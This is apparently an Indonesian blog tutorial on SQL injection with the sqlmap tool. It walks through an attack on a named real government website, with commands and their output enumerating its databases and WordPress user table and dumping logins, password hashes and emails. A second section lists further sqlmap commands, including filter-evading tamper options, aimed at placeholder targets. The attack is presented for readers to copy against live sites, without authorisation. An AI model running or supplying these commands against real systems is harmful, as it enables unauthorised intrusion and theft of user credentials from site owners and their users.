Sql Injection merupakan tekhnik dari sekian tekhnik yang sering di lakukan oleh hacker dalam melakukan penetrasi. Hal ini dikarenakan bug sql injection sering kita jumpai pada banyak website di internet.
Nah, kali ini saya coba sharing cara hacking dengan tekhnik sql injection. Akan tetapi dengan bantuan tool SqlMap. Terimakasih tentunya untuk pengembangnya yakni Bernardo Damele AG & Miroslav Stampar yang telah mempermudah kita untuk melakukan penetrasi.
Aplikasi mendukung beberapa database : MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Enam tekhnik sql-injection : boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Dan fitur - fitur lain sebagainya..
Nah bagi anda pengguna windows xp, vista, 7 dan 8, anda pun dapat menggunakannya.
Yakni dengan install python di komputer anda. Silahkan download kedua paket ini :
Phyton : http://www.python.org/download/
Sqlmap : http://sqlmap.sourceforge.net/
Cukup download Sqlmap dan letakkan di direktori PC kita. Disini saya misalkan sqlmap di direktori C:
1. Sqlmap Live Target
Tentunya saya akan coba penetrasi pada website target, moga-moga paham :)
Web target : http://www.psf.gov.pk/staffdetail.php?id=10
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dbs
available databases [2]:
[*] information_schema
[*] psfdb
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --tables psfd
+-----------------------------------+
| user |
| users_site |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_options2 |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------------------+
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --columns -D psfdb -T wp_users
+---------------------------+-------------------------+
| Column | Type |
+---------------------------+-------------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------------+------------------------+
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dump -D psfdb -T wp_users
code:
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users -C user_login,user_pass,user_email --dump
Than tou will see the dump database in C:\Hack\sql\sqlmap\output
2. Some Powerfull Command Sqlmap
sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users (HTTP Data)
sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users
sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
--auth-type Basic --auth-cred "testuser:testpass"
sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper \
tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns \
-D testdb -T users -C name (Enumerate database table columns)
Jika ingin lebih mengetauhi perintah - perintah di sqlmap.
Kita bisa mendapatkan pencerahan di sini
Goodluck !
0 komentar:
Posting Komentar